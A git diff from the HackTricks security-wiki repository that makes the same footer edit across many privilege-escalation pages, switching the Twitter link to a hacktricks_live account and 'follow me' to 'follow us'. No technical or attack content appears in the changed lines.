@@ -71,7 +71,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index 9f474a95a..1d39d58c6 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -109,7 +109,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md index 8e6c6fec7..adb562e89 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -120,7 +120,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md index cc08b6e3e..b222577fc 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -123,7 +123,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md index ae6d9d256..38001fd29 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -104,7 +104,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md index c91782a3c..60b5fec57 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -108,7 +108,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/seccomp.md b/linux-hardening/privilege-escalation/docker-security/seccomp.md index a41f2439c..0e2fc5bf9 100644 --- a/linux-hardening/privilege-escalation/docker-security/seccomp.md +++ b/linux-hardening/privilege-escalation/docker-security/seccomp.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -187,7 +187,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md index b9836d243..522f9a413 100644 --- a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md +++ b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -50,7 +50,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index 12eed9087..f09a01b29 100644 --- a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md +++ b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -314,7 +314,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/ld.so.conf-example.md b/linux-hardening/privilege-escalation/ld.so.conf-example.md index c09b7b779..c9e7f58c0 100644 --- a/linux-hardening/privilege-escalation/ld.so.conf-example.md +++ b/linux-hardening/privilege-escalation/ld.so.conf-example.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -176,7 +176,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md index 7300f6342..0c13b6978 100644 --- a/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/linux-hardening/privilege-escalation/linux-capabilities.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -1731,7 +1731,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/logstash.md b/linux-hardening/privilege-escalation/logstash.md index 2cce631f8..1489b6bde 100644 --- a/linux-hardening/privilege-escalation/logstash.md +++ b/linux-hardening/privilege-escalation/logstash.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -86,7 +86,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index e1227e18d..d6866910a 100644 --- a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -149,7 +149,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/linux-hardening/privilege-escalation/runc-privilege-escalation.md index 5b5f5ff83..9a4fff6e0 100644 --- a/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/runc-privilege-escalation.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
